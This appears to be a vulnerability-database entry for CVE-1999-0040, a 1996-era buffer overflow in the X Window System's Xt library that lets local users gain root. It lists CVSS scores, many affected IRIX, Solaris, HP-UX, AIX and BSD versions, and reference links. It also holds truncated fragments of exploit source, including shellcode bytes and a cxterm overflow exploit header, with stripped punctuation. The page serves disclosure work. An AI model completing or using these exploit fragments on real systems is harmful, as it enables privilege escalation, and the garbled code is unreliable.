CVE-1999-0040

Published: 01/05/1997 Updated: 17/08/2022

CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9

VMScore: 745

Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Buffer overflow in Xt library of X Windowing System allows local users to execute commands with root privileges.

Vulnerable Product	Search on Vulmon	Subscribe to Product
sgi irix 5.3
sgi irix 4.0
sgi irix 6.1
sgi irix 6.4
sgi irix 5.0
sgi irix 6.0
sgi irix 6.3
sgi irix 6.2
sun sunos 5.3
hp hp-ux 10.30
nec ews-ux v 4.2mp
hp hp-ux 9.10
sun sunos 4.1.4
hp hp-ux 10.01
sun solaris 2.4
hp hp-ux 10.00
sun solaris 2.5.1
sun solaris 2.5
ibm aix 4.2
bsdi bsd os 2.0
freebsd freebsd 1.1.5.1
hp hp-ux 10.34
nec asl ux 4800 64
sun sunos 5.5
nec ews-ux v 4.2
bsdi bsd os 2.1
hp hp-ux 10.24
hp hp-ux 9.00
sun sunos 5.4
hp hp-ux 10.08
sun sunos 5.5.1
hp hp-ux 10.20
sun sunos 4.1.3u1
sun sunos 4.1.3
bsdi bsd os 2.0.1
hp hp-ux 9.01
ibm aix 4.1
hp hp-ux 10.09
ibm aix 3.2
hp hp-ux 10.10
nec up-ux v 4.2mp
freebsd freebsd 2.0
hp hp-ux 10.16

/* source: wwwsecurityfocuscom/bid/237/info The libXt library is part of the X Windows system There are several buffer overflow conditions that may allow an unauthorized user to gain root privileges through setuid and setgid programs that are linked to libXt These problems were openly discussed on the Bugtraq mailing list in 1996, this ...

#include #include #include #define DEFAULT_OFFSET 0 #define BUFFER_SIZE 1491 long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char **argv) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\ ...

/* cxterm buffer overflow exploit for Linux This code is tested on both Slackware 31 and 32 Ming Zhang mzhang@softcomnet */ #include <unistdh> #include <stdioh> #include <stdlibh> #include <fcntlh> #define CXTERM_PATH "/usr/X11R6/bin/cxterm" #define BUFFER_SIZ ...

/* source: wwwsecurityfocuscom/bid/237/info The libXt library is part of the X Windows system There are several buffer overflow conditions that may allow an unauthorized user to gain root privileges through setuid and setgid programs that are linked to libXt These problems were openly discussed on the Bugtraq mailing list in 1996, this ...

/* source: wwwsecurityfocuscom/bid/237/info The libXt library is part of the X Windows system There are several buffer overflow conditions that may allow an unauthorized user to gain root privileges through setuid and setgid programs that are linked to libXt These problems were openly discussed on the Bugtraq mailing list in 1996, thi ...

NVD-CWE-Other https://exchange.xforce.ibmcloud.com/vulnerabilities/CVE-1999-0040 https://nvd.nist.gov https://www.exploit-db.com/exploits/19201/

CVE-1999-0040

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect